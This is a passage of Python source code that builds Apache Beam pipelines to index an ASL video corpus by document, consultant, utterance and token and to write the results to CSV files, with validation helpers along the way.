| "Beam PL: 'explode' (<corpus doc id>, <corpus doc filename>, <asl consultant_id>, <participant name>) lists" >> beam.FlatMap(lambda list_doc_id_to_asl_consultant_id_tpl: list_doc_id_to_asl_consultant_id_tpl)
| "Beam PL: apply schema to extracted document_asl_consultant_index_schemad_pcoll tuples" >> beam.Map(lambda document_asl_consultant_mapping_tpl: beam.Row(
DocumentID=int(document_asl_consultant_mapping_tpl[0]),
Filename=document_asl_consultant_mapping_tpl[1],
ASLConsultantID=int(document_asl_consultant_mapping_tpl[2]),
ParticipantName=document_asl_consultant_mapping_tpl[3]
)
)
# debug
# | "Beam PL: print document_asl_consultant_mapping" >> beam.ParDo(beam__common.PipelinePcollPrinter("document_asl_consultant_mapping entry"))
)
return document_asl_consultant_index_schemad_pcoll
def pl__6__write_document_asl_consultant_index_csv(document_asl_consultant_index_schemad_pcoll, d_pl_options):
distinct_document_asl_consultant_index_schemad_pcoll = (
document_asl_consultant_index_schemad_pcoll
| "Beam PL: extract SCHEMA_COL_NAMES__DOCUMENT_ASL_CONSULTANT_DS columns from document_asl_consultant_index_schemad_pcoll" >> beam.Map(
lambda document_asl_consultant_index_schemad_pcoll_row: (
document_asl_consultant_index_schemad_pcoll_row.DocumentID,
document_asl_consultant_index_schemad_pcoll_row.ASLConsultantID,
document_asl_consultant_index_schemad_pcoll_row.Filename,
document_asl_consultant_index_schemad_pcoll_row.ParticipantName
)
)
| "Beam PL: select distinct document_asl_consultant_index rows" >> beam.Distinct()
)
sorted_distinct_document_asl_consultant_index_schemad_pcoll= beam__common.pl__X__sort_pcoll(distinct_document_asl_consultant_index_schemad_pcoll, pcoll_label="distinct_document_asl_consultant_index")
sorted_distinct_document_asl_consultant_index_csv_rows_pcoll = (
sorted_distinct_document_asl_consultant_index_schemad_pcoll
| "Beam PL: apply minimal schema to create final document_asl_consultant_index_schemad_pcoll of distinct rows" >> beam.Map(
lambda sorted_distinct_document_asl_consultant_index_row: beam.Row(
DocumentID=int(sorted_distinct_document_asl_consultant_index_row[0]),
ASLConsultantID=int(sorted_distinct_document_asl_consultant_index_row[1]),
Filename=str(sorted_distinct_document_asl_consultant_index_row[2]),
ParticipantName=str(sorted_distinct_document_asl_consultant_index_row[3])
)
)
| beam.Map(lambda distinct_document_asl_consultant_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(distinct_document_asl_consultant_index_schemad_pcoll_row))
)
return beam__common.pl__X__write_pcoll_to_csv(
sorted_distinct_document_asl_consultant_index_csv_rows_pcoll,
"DOCUMENT-ASLCONSULTANT-INDEX",
fidscs_globals.DOCUMENT_ASL_CONSULTANT_DS_FNAME,
fidscs_globals.SCHEMA_COL_NAMES__DOCUMENT_ASL_CONSULTANT_DS,
d_pl_options
) # document_asl_consultant_index_csv_path
def pl__6__create_document_asl_consultant_utterance_index_schemad_pcoll(ss_parsed_xmldb_pcoll, document_asl_consultant_index_schemad_pcoll, d_pl_options):
corpus_document_participant_utterance_mapping = (
ss_parsed_xmldb_pcoll
| "Beam PL: 'explode' ss_parsed_xmldb_pcoll_row_dict 'UTTERANCE_SEQUENCE'" >> beam.Map(
lambda ss_parsed_xmldb_pcoll_row_dict: [
(
(
ss_parsed_xmldb_pcoll_row_dict['CORPUS_DOCUMENT_FILENAME'], # <corpus document filename>
participant_utterance_sequence[0], # <participant name>
),
participant_utterance_sequence[1], # <participant utterance sequence>
) for participant_utterance_sequence in [
(participant['PARTICIPANT_NAME'], participant['UTTERANCE_SEQUENCE']) for participant in ss_parsed_xmldb_pcoll_row_dict['PARTICIPANT_SEQUENCE']
]
]
)
| "Beam PL: 'explode' ((<participant name>, <corpus document filename>), <participant utterance sequence>) lists" >> beam.FlatMap(lambda list_participant_utterance_sequence_doc_tpl: list_participant_utterance_sequence_doc_tpl)
| "Beam PL: 'explode' <participant utterance sequence> from ((<participant name>, <corpus document filename>), <participant utterance sequence>)" >> beam.Map(
lambda participant_doc_utterance_sequence_tpl: [
(
(
utterance_seq_id,
' '.join([d_token['TOKEN_LINGUSTIC_TEXT'].decode('ascii') for d_token in participant_utterance['TOKEN_SEQUENCE']]), # <participant utterance linguistic token sequence text>
participant_utterance['UTTERANCE_ENGLISH_TRANSLATION'], # <participant utterance English translation>
participant_utterance['UTTERANCE_START_TIME'], # <participant utterance start time>
participant_utterance['UTTERANCE_END_TIME'], # <participant utterance end time>
),
(
participant_doc_utterance_sequence_tpl[0][0], # <participant name>
participant_doc_utterance_sequence_tpl[0][1], # <corpus document filename>
)
) for utterance_seq_id, participant_utterance in enumerate(participant_doc_utterance_sequence_tpl[1])
]
)
| "Beam PL: 'explode' participant_utterance_name_doc_tpl lists" >> beam.FlatMap(
lambda list_participant_utterance_name_doc_tpl: list_participant_utterance_name_doc_tpl
)
| "Beam PL: transform participant_utterance_name_doc_tpl to be keyed by (<corpus document filename>, <participant name>)" >> beam.Map(
lambda participant_utterance_name_doc_keyed_by_utterance_seq_id_tpl: (
participant_utterance_name_doc_keyed_by_utterance_seq_id_tpl[1], # (<corpus document filename>, <participant name>)
(
participant_utterance_name_doc_keyed_by_utterance_seq_id_tpl[0][0], # <utterance seq id>
participant_utterance_name_doc_keyed_by_utterance_seq_id_tpl[0][1], # <utterance linguistic token sequence text>
participant_utterance_name_doc_keyed_by_utterance_seq_id_tpl[0][2], # <utterance English translation>
participant_utterance_name_doc_keyed_by_utterance_seq_id_tpl[0][3], # <utterance start time>
participant_utterance_name_doc_keyed_by_utterance_seq_id_tpl[0][4] # <utterance end time>
)
)
)
# debug
# | "Beam PL: print corpus_document_participant_utterance_mapping" >> beam.ParDo(beam__common.PipelinePcollPrinter("corpus_document_participant_utterance_mapping entry"))
)
corpus_document_participant_doc_id_asl_consultant_id_mapping = (
document_asl_consultant_index_schemad_pcoll
| "Beam PL: extract ((<corpus document filename>, <participant name>), (<corpus document id>, <asl consultant id>)) from document_asl_consultant_index_schemad_pcoll" >> beam.Map(
lambda document_asl_consultant_index_schemad_pcoll_row: (
(document_asl_consultant_index_schemad_pcoll_row.Filename, document_asl_consultant_index_schemad_pcoll_row.ParticipantName),
(document_asl_consultant_index_schemad_pcoll_row.DocumentID, document_asl_consultant_index_schemad_pcoll_row.ASLConsultantID)
)
)
# debug
# | "Beam PL: print corpus_document_participant_doc_id_asl_consultant_id_mapping" >> beam.ParDo(beam__common.PipelinePcollPrinter("corpus_document_participant_doc_id_asl_consultant_id_mapping entry"))
)
document_asl_consultant_utterance_index_schemad_pcoll = (
({
'corpus_document_participant_doc_id_asl_consultant_id_mapping': corpus_document_participant_doc_id_asl_consultant_id_mapping,
'corpus_document_participant_utterance_mapping': corpus_document_participant_utterance_mapping
})
| "Beam PL: merge corpus_document_participant_doc_id_asl_consultant_id_mapping and corpus_document_participant_utterance_mapping" >> beam.CoGroupByKey()
# the above produces tuples of the form:
# (
# (<corpus doc filename>, <participant name>),
# {
# 'corpus_document_participant_doc_id_asl_consultant_id_mapping': [(<corpus doc id>, <asl consultant id>)], # note that this list should always only have a single tuple
#
# 'corpus_document_participant_utterance_mapping': [
# (<utterance seq id>, <utterance linguistic token sequence text>, <utterance English translation>, <utterance start time>, <utterance end time>) # there are many of these
# ]
# }
# )
| "Beam PL: 'explode' corpus_document_participant_utterance_mapping list from merge result" >> beam.Map(
lambda merged_mapping_tpl: [
(
merged_mapping_tpl[0],
(
merged_mapping_tpl[1]['corpus_document_participant_doc_id_asl_consultant_id_mapping'][0],
corpus_document_participant_utterance_mapping
),
) for corpus_document_participant_utterance_mapping in merged_mapping_tpl[1]['corpus_document_participant_utterance_mapping']
]
)
| "Beam PL: 'explode' doc_participant_utterances lists" >> beam.FlatMap(
lambda list_doc_participant_utterances_tpl: list_doc_participant_utterances_tpl
) # produces tuples of the form (('football.xml', 'Michael Schlang'), ((32, 1), (54, '...it can create many things.', 189800, 191733)))
| "Beam PL: apply schema to doc_participant_utterance rows" >> beam.Map(
lambda doc_participant_utterances_tpl: beam.Row(
Filename=doc_participant_utterances_tpl[0][0],
DocumentID=int(doc_participant_utterances_tpl[1][0][0]),
ParticipantName=doc_participant_utterances_tpl[0][1],
ASLConsultantID=int(doc_participant_utterances_tpl[1][0][1]),
UtteranceSequence=doc_participant_utterances_tpl[1][1][0],
StartTime=doc_participant_utterances_tpl[1][1][3],
EndTime=doc_participant_utterances_tpl[1][1][4],
Tokens=doc_participant_utterances_tpl[1][1][1],
Translation=doc_participant_utterances_tpl[1][1][2]
)
)
# debug
# | "Beam PL: print document_asl_consultant_utterance_index_schemad_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter("document_asl_consultant_utterance_index_schemad_pcoll entry"))
)
return document_asl_consultant_utterance_index_schemad_pcoll
def pl__7__write_document_asl_consultant_utterance_index_csv(document_asl_consultant_utterance_index_schemad_pcoll, d_pl_options):
distinct_document_asl_consultant_utterance_index_schemad_pcoll = (
document_asl_consultant_utterance_index_schemad_pcoll
| "Beam PL: extract SCHEMA_COL_NAMES__UTTERANCE_DS columns from document_asl_consultant_utterance_index_schemad_pcoll" >> beam.Map(
lambda document_asl_consultant_utterance_index_schemad_pcoll_row: (
# SCHEMA_COL_NAMES__UTTERANCE_DS = [
# 'DocumentID',
# 'ASLConsultantID',
# 'UtteranceSequence',
# 'StartTime',
# 'EndTime',
# 'Tokens',
# 'Translation'
# ]
document_asl_consultant_utterance_index_schemad_pcoll_row.DocumentID,
document_asl_consultant_utterance_index_schemad_pcoll_row.ASLConsultantID,
document_asl_consultant_utterance_index_schemad_pcoll_row.UtteranceSequence,
document_asl_consultant_utterance_index_schemad_pcoll_row.StartTime,
document_asl_consultant_utterance_index_schemad_pcoll_row.EndTime,
document_asl_consultant_utterance_index_schemad_pcoll_row.Tokens,
document_asl_consultant_utterance_index_schemad_pcoll_row.Translation
)
)
| "Beam PL: select distinct document_asl_consultant_utterance_index rows" >> beam.Distinct()
)
sorted_distinct_document_asl_consultant_utterance_index_schemad_pcoll= beam__common.pl__X__sort_pcoll(distinct_document_asl_consultant_utterance_index_schemad_pcoll, pcoll_label="distinct_document_asl_consultant_utterance_index")
sorted_distinct_document_asl_consultant_utterance_index_csv_rows_pcoll = (
sorted_distinct_document_asl_consultant_utterance_index_schemad_pcoll
| "Beam PL: apply minimal schema to create final document_asl_consultant_utterance_index_schemad_pcoll of distinct rows" >> beam.Map(
lambda distinct_document_asl_consultant_utterance_index_row: beam.Row(
DocumentID=int(distinct_document_asl_consultant_utterance_index_row[0]),
ASLConsultantID=int(distinct_document_asl_consultant_utterance_index_row[1]),
UtteranceSequence=int(distinct_document_asl_consultant_utterance_index_row[2]),
StartTime=int(distinct_document_asl_consultant_utterance_index_row[3]),
EndTime=int(distinct_document_asl_consultant_utterance_index_row[4]),
Tokens=distinct_document_asl_consultant_utterance_index_row[5],
Translation=distinct_document_asl_consultant_utterance_index_row[6]
)
)
| beam.Map(lambda distinct_document_asl_consultant_utterance_index_row: beam__common.beam_row_to_csv_string(distinct_document_asl_consultant_utterance_index_row))
)
return beam__common.pl__X__write_pcoll_to_csv(
sorted_distinct_document_asl_consultant_utterance_index_csv_rows_pcoll,
"DOCUMENT-ASLCONSULTANT-UTTERANCE-INDEX",
fidscs_globals.UTTERANCE_DS_FNAME,
fidscs_globals.SCHEMA_COL_NAMES__UTTERANCE_DS,
d_pl_options
) # document_asl_consultant_utterance_index_csv_path
def validate_preprocess_merged_corpus_doc_asl_consultant_utterance_token(merged_doc_participant_utterance_token):
"""
merged_doc_participant_utterance_token:
(
(<document fname>, <participant name>), # key
{
'utterance_token_mapping': [(
<utterance seq id>,
<token linguistic text>,
<token (new) seq id>,
<token start time>,
<token end time>
)],
'document_id_asl_consultant_id_mapping': [(
<corpus doc id>,
<asl consultant id>
)]
}
)
return: (
(<corpus doc id>, <asl consultant id>, <utterance seq id>, <token seq id>), # key
# associated data (validated)
(<document fname>, <participant name>, <token linguistic text>, <token start time>, <token end time>)
)
"""
doc_fname = merged_doc_participant_utterance_token[0][0]
if len(doc_fname)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} contains invalid doc_fname {doc_fname}!")
return merged_doc_participant_utterance_token # this will throw an exception since other validation rows be differently shaped
participant_name = merged_doc_participant_utterance_token[0][1]
if len(participant_name)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} contains invalid participant_name {participant_name}!")
return merged_doc_participant_utterance_token # this will throw an exception since other validation rows be differently shaped
utterance_token_mapping = merged_doc_participant_utterance_token[1]['utterance_token_mapping']
document_id_asl_consultant_id_mapping = merged_doc_participant_utterance_token[1]['document_id_asl_consultant_id_mapping']
validated_results = []
multiple_docs = []
multiple_asl_consultants = []
# there should always only be ONE (<corpus doc id>, <asl consultant id>) in document_id_asl_consultant_id_mapping
doc_id = None
asl_consultant_id = None
if len(document_id_asl_consultant_id_mapping) > 0:
for document_id_asl_consultant_id_mapping_instance in document_id_asl_consultant_id_mapping:
_doc_id = document_id_asl_consultant_id_mapping_instance[0]
if isinstance(_doc_id, int) and _doc_id>-1 and _doc_id not in multiple_docs:
multiple_docs.append(_doc_id)
_asl_consultant_id = document_id_asl_consultant_id_mapping_instance[1]
if isinstance(_asl_consultant_id, int) and _asl_consultant_id>-1 and _asl_consultant_id not in multiple_asl_consultants:
multiple_asl_consultants.append(_asl_consultant_id)
if len(multiple_docs)>1 or len(multiple_asl_consultants)>1:
multiple_associations = zip(multiple_docs, multiple_asl_consultants)
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} (<corpus doc id>, <asl consultant id>) association is not unique! It occurs has the following (<corpus doc id>, <asl consultant id>) associations: {multiple_associations}")
return merged_doc_participant_utterance_token # this will throw an exception since other validation rows be differently shaped
else:
doc_id = multiple_docs[0]
asl_consultant_id = multiple_asl_consultants[0]
else:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} does not have a (<corpus doc id>, <asl consultant id>) association!")
return merged_doc_participant_utterance_token # this will throw an exception since other validation rows be differently shaped
if len(utterance_token_mapping) > 0:
for utterance_token_mapping_instance in utterance_token_mapping:
_utterance_seq_id = utterance_token_mapping_instance[0]
if not isinstance(_utterance_seq_id, int) or _utterance_seq_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} contains invalid _utterance_seq_id {_utterance_seq_id} in utterance_token_mapping!")
return merged_doc_participant_utterance_token # this will throw an exception since other validation rows be differently shaped
_token_ling_text = utterance_token_mapping_instance[1]
if len(_token_ling_text)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} contains invalid _token_ling_text {_token_ling_text} in utterance_token_mapping!")
return merged_doc_participant_utterance_token # this will throw an exception since other validation rows be differently shaped
_token_new_seq_id = utterance_token_mapping_instance[2]
if not isinstance(_token_new_seq_id, int) or _token_new_seq_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} contains invalid _token_new_seq_id {_token_new_seq_id} in utterance_token_mapping!")
return merged_doc_participant_utterance_token # this will throw an exception since other validation rows be differently shaped
_token_start_time = utterance_token_mapping_instance[3]
if not isinstance(_token_start_time, int) or _token_start_time<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} contains invalid _token_start_time {_token_start_time} in utterance_token_mapping!")
return merged_doc_participant_utterance_token # this will throw an exception since other validation rows be differently shaped
_token_end_time = utterance_token_mapping_instance[4]
if not isinstance(_token_end_time, int) or _token_end_time<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} contains invalid _token_end_time {_token_end_time} in utterance_token_mapping!")
return merged_doc_participant_utterance_token # this will throw an exception since other validation rows be differently shaped
validated_results.append(
(
(doc_id, asl_consultant_id, _utterance_seq_id, _token_new_seq_id),
(doc_fname, participant_name, _token_ling_text, _token_start_time, _token_end_time)
)
)
else:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} merged_doc_participant_utterance_token key {merged_doc_participant_utterance_token[0]} is not associated with an utterance_token_mapping!")
return merged_doc_participant_utterance_token # this will throw an exception since other validation rows be differently shaped
return validated_results
def validate_preprocess_document_asl_consultant_utterance_token_tpl(document_asl_consultant_utterance_token_tpl):
"""
document_asl_consultant_utterance_token_tpl:
document_asl_consultant_utterance_token_index_schemad_pcoll
(
<token linguistic text>,
{
'vocabulary_token_id_map': [<vocab token id>],
'doc_participant_utterance_token_info_map': [(
<corpus doc id>,
<document fname>,
<asl consultant id>,
<participant name>,
<utterance seq id>,
<token (new) seq id>,
<token start time>,
<token end time>
)]
}
)
return:
listof(
(
<corpus doc id>,
<corpus document fname>,
<asl consultant id>,
<participant name>,
<utterance seq id>,
<vocab token id>,
<token linguistic text>,
<token (new) seq id>,
<token start time>,
<token end time>
)
)
"""
token_ling_text = document_asl_consultant_utterance_token_tpl[0]
if len(token_ling_text)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl key is invalid: {token_ling_text}!")
return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows be differently shaped
vocabulary_token_id_map = document_asl_consultant_utterance_token_tpl[1]['vocabulary_token_id_map']
if len(vocabulary_token_id_map) == 0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) does not have a <vocab token id> association!")
return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows be differently shaped
doc_participant_utterance_token_info_map = document_asl_consultant_utterance_token_tpl[1]['doc_participant_utterance_token_info_map']
if len(doc_participant_utterance_token_info_map) == 0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) does not have a doc_participant_utterance_token_info_map!")
return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows be differently shaped
validated_results = []
multiple_token_ids = []
vocab_token_id = None
for vocabulary_token_id_map_instance in vocabulary_token_id_map:
_vocab_token_id = vocabulary_token_id_map_instance
if isinstance(_vocab_token_id, int) and _vocab_token_id>-1 and _vocab_token_id not in multiple_token_ids:
multiple_token_ids.append(_vocab_token_id)
if len(multiple_token_ids) > 1:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) <vocab token id> association is not unique! It occurs has the following <vocab token id> associations: {multiple_token_ids}")
return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows be differently shaped
else:
vocab_token_id = multiple_token_ids[0]
for doc_participant_utterance_token_info_map_instance in doc_participant_utterance_token_info_map:
_corpus_doc_id = doc_participant_utterance_token_info_map_instance[0]
if not isinstance(_corpus_doc_id, int) or _corpus_doc_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _corpus_doc_id {_corpus_doc_id} in doc_participant_utterance_token_info_map!")
return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows be differently shaped
_doc_fname = doc_participant_utterance_token_info_map_instance[1]
if len(_doc_fname)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _doc_fname {_doc_fname} in doc_participant_utterance_token_info_map!")
return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows be differently shaped
_asl_consultant_id = doc_participant_utterance_token_info_map_instance[2]
if not isinstance(_asl_consultant_id, int) or _asl_consultant_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _asl_consultant_id {_asl_consultant_id} in doc_participant_utterance_token_info_map!")
return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows be differently shaped
_participant_name = doc_participant_utterance_token_info_map_instance[3]
if len(_participant_name)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _participant_name {_participant_name} in doc_participant_utterance_token_info_map!")
return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows be differently shaped
_utterance_seq_id = doc_participant_utterance_token_info_map_instance[4]
if not isinstance(_utterance_seq_id, int) or _utterance_seq_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _utterance_seq_id {_utterance_seq_id} in doc_participant_utterance_token_info_map!")
return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows be differently shaped
_token_new_seq_id = doc_participant_utterance_token_info_map_instance[5]
if not isinstance(_token_new_seq_id, int) or _token_new_seq_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _token_new_seq_id {_token_new_seq_id} in doc_participant_utterance_token_info_map!")
return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows be differently shaped
_token_start_time = doc_participant_utterance_token_info_map_instance[6]
if not isinstance(_token_start_time, int) or _token_start_time<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _token_start_time {_token_start_time} in doc_participant_utterance_token_info_map!")
return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows be differently shaped
_token_end_time = doc_participant_utterance_token_info_map_instance[7]
if not isinstance(_token_end_time, int) or _token_end_time<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant_utterance_token_tpl (key {token_ling_text}) contains invalid _token_end_time {_token_end_time} in doc_participant_utterance_token_info_map!")
return document_asl_consultant_utterance_token_tpl # this will throw an exception since other validation rows be differently shaped
validated_results.append(
(
_corpus_doc_id,
_doc_fname,
_asl_consultant_id,
_participant_name,
_utterance_seq_id,
vocab_token_id,
token_ling_text,
_token_new_seq_id,
_token_start_time,
_token_end_time
)
)
return validated_results
def pl__6__create_document_asl_consultant_utterance_token_index_schemad_pcoll(ss_parsed_xmldb_pcoll, document_asl_consultant_index_schemad_pcoll, d_pl_options):
doc_participant_utterance_token_mapping = (
ss_parsed_xmldb_pcoll
| "Beam PL: get token associated with this ss_parsed_xmldb, participant, utterance, keyed by doc filename, participant name, utterance seq id, token linguistic text" >> beam.Map(
lambda ss_parsed_xmldb_pcoll_row_dict: [
(
(
doc_participant_utterance_token_tpl[0], # <corpus doc filename>
doc_participant_utterance_token_tpl[1], # <participant name>
doc_participant_utterance_token_tpl[2], # <utterance seq id>
doc_participant_utterance_token_tpl[4], # <token linguistic text> (ascii representation of the byte-string)
), # key
(
doc_participant_utterance_token_tpl[3], # <token (new) seq id>
doc_participant_utterance_token_tpl[5], # <token start time>
doc_participant_utterance_token_tpl[6], # <token end time>
) # token data
) for doc_participant_utterance_token_tpl in [
(
ss_parsed_xmldb_pcoll_row_dict['CORPUS_DOCUMENT_FILENAME'],
d_participant['PARTICIPANT_NAME'],
utterance_seq_id,
token_new_seq_id,
d_token['TOKEN_LINGUSTIC_TEXT'], # we get an ascii representation of the byte-string
d_token['TOKEN_START_TIME'],
d_token['TOKEN_END_TIME']
) for d_participant in ss_parsed_xmldb_pcoll_row_dict['PARTICIPANT_SEQUENCE']
for utterance_seq_id, d_utterance in enumerate(d_participant['UTTERANCE_SEQUENCE'])
for token_new_seq_id, d_token in enumerate(d_utterance['TOKEN_SEQUENCE'])
]
]
) # outputs pcoll with each row list of ((<corpus doc filename>, <participant name>, <utterance seq id>, <token linguistic text>), (<token (new) seq id>, <token start time>, <token end time>))
| "Beam PL: 'explode' list of doc_participant_utterance_token_mapping tuples" >> beam.FlatMap(lambda list_doc_participant_utterance_token_mapping_tpl: list_doc_participant_utterance_token_mapping_tpl)
# the above produces a pcoll with rows as:
# ((<corpus doc filename>, <participant name>, <utterance seq id>, <token linguistic text>), (<token (new) seq id>, <token start time>, <token end time>))
| "Beam PL: select distinct doc_participant_utterance_token_mapping tuples" >> beam.Distinct()
# debug
# | "Beam PL: print doc_participant_utterance_token_mapping" >> beam.ParDo(beam__common.PipelinePcollPrinter("doc_participant_utterance_token_mapping entry"))
)
# now extract distinct token linguistic text from doc_participant_utterance_token_mapping to build the final vocabulary index
ling_text_pcoll = (
doc_participant_utterance_token_mapping
# ((<corpus doc filename>, <participant name>, <utterance seq id>, <token linguistic text>), (<token (new) seq id>, <token start time>, <token end time>))
| "Beam PL: extract token linguistic text" >> beam.Map(lambda doc_participant_utterance_token_mapping_row_tpl: doc_participant_utterance_token_mapping_row_tpl[0][3])
| "Beam PL: select distinct token linguistic text" >> beam.Distinct()
)
indexed_ling_text = beam__common.pl__X__index_pcoll(ling_text_pcoll, "ling_text_pcoll")
# the above produces tuples of the form:
# (<vocab token id>, <vocab token linguistic text>)
vocabulary_index_pcoll = (
indexed_ling_text
| "Beam PL: apply schema to vocabulary_index_pcoll rows" >> beam.Map(
lambda vocabulary_index_pcoll_row_tpl: beam.Row(
# SCHEMA_COL_NAMES__VOCABULARY_DS = [
# 'TokenID',
# 'Token'
# ]
TokenID=int(vocabulary_index_pcoll_row_tpl[0]),
Token=vocabulary_index_pcoll_row_tpl[1]
)
)
# debug
# | "Beam PL: print vocabulary" >> beam.ParDo(beam__common.PipelinePcollPrinter("vocabulary token"))
)
document_asl_consultant_mapping = (
document_asl_consultant_index_schemad_pcoll
| beam.Map(
lambda document_asl_consultant_index_schemad_pcoll_row: (
(document_asl_consultant_index_schemad_pcoll_row.Filename, document_asl_consultant_index_schemad_pcoll_row.ParticipantName),
(document_asl_consultant_index_schemad_pcoll_row.DocumentID, document_asl_consultant_index_schemad_pcoll_row.ASLConsultantID)
)
) # outputs rows as ((<corpus doc filename>, <participant name>), (<corpus doc id>, <asl consultant id>))
)
doc_participant_utterance_token_mapping_2 = (
doc_participant_utterance_token_mapping
# have: ((<corpus doc filename>, <participant name>, <utterance seq id>, <token linguistic text>), (<token (new) seq id>, <token start time>, <token end time>))
# need: ((<corpus doc filename>, <participant name>), (<utterance seq id>, <token linguistic text>, <token (new) seq id>, <token start time>, <token end time>))
| beam.Map(
lambda doc_participant_utterance_token_mapping_row_tpl: (
(
doc_participant_utterance_token_mapping_row_tpl[0][0], # <corpus doc filename>
doc_participant_utterance_token_mapping_row_tpl[0][1] # <participant name>
),
(
doc_participant_utterance_token_mapping_row_tpl[0][2], # <utterance seq id>
doc_participant_utterance_token_mapping_row_tpl[0][3], # <token linguistic text>
doc_participant_utterance_token_mapping_row_tpl[1][0], # <token (new) seq id>
doc_participant_utterance_token_mapping_row_tpl[1][1], # <token start time>
doc_participant_utterance_token_mapping_row_tpl[1][2], # <token end time>
)
)
)
)
# merge <corpus doc id>, <asl consultant id>, <token (new) seq id>, <token start time>, <token end time>
merged_doc_participant_utterance_token = (
({
'utterance_token_mapping': doc_participant_utterance_token_mapping_2,
'document_id_asl_consultant_id_mapping': document_asl_consultant_mapping
})
| "Beam PL: merge utterance_token_mapping and document_id_asl_consultant_id_mapping" >> beam.CoGroupByKey()
# (
# (<document fname>, <participant name>), # key
# {
# 'utterance_token_mapping': [(
# <utterance seq id>,
# <token linguistic text>,
# <token (new) seq id>,
# <token start time>,
# <token end time>
# )],
# 'document_id_asl_consultant_id_mapping': [(
# <corpus doc id>,
# <asl consultant id>
# )]
# }
# )
| "Beam PL: validate/preprocess merged_doc_participant_utterance_token" >> beam.FlatMap(validate_preprocess_merged_corpus_doc_asl_consultant_utterance_token)
# the above produces tuples in the form:
# ((<corpus doc id>, <asl consultant id>, <utterance seq id>, <token (new) seq id>), (<document fname>, <participant name>, <token linguistic text>, <token start time>, <token end time>))
# debug
# | "Beam PL: print validated merged_doc_participant_utterance_token" >> beam.ParDo(beam__common.PipelinePcollPrinter("merged_doc_participant_utterance_token (validated) entry"))
)
# transform merged_doc_participant_utterance_token tuples:
# have:
# ((<corpus doc id>, <asl consultant id>, <utterance seq id>, <token (new) seq id>), (<document fname>, <participant name>, <token linguistic text>, <token start time>, <token end time>))
# need:
# (<token linguistic text>, (<corpus doc id>, <document fname>, <asl consultant id>, <participant name>, <utterance seq id>, <token (new) seq id>, <token start time>, <token end time>))
doc_participant_utterance_by_token_ling_text = (
merged_doc_participant_utterance_token
| beam.Map(
lambda merged_doc_participant_utterance_token_row_tpl: (
merged_doc_participant_utterance_token_row_tpl[1][2], # <token linguistic text> (key)
(
merged_doc_participant_utterance_token_row_tpl[0][0], # <corpus doc id>
merged_doc_participant_utterance_token_row_tpl[1][0], # <document fname>
merged_doc_participant_utterance_token_row_tpl[0][1], # <asl consultant id>
merged_doc_participant_utterance_token_row_tpl[1][1], # <participant name>
merged_doc_participant_utterance_token_row_tpl[0][2], # <utterance seq id>
merged_doc_participant_utterance_token_row_tpl[0][3], # <token (new) seq id>
merged_doc_participant_utterance_token_row_tpl[1][3], # <token start time>
merged_doc_participant_utterance_token_row_tpl[1][4], # <token end time>
)
)
)
)
# transform vocabulary_index_pcoll tuples
# have:
# beam.Row(
# # SCHEMA_COL_NAMES__VOCABULARY_DS = [
# # 'TokenID',
# # 'Token'
# # ]
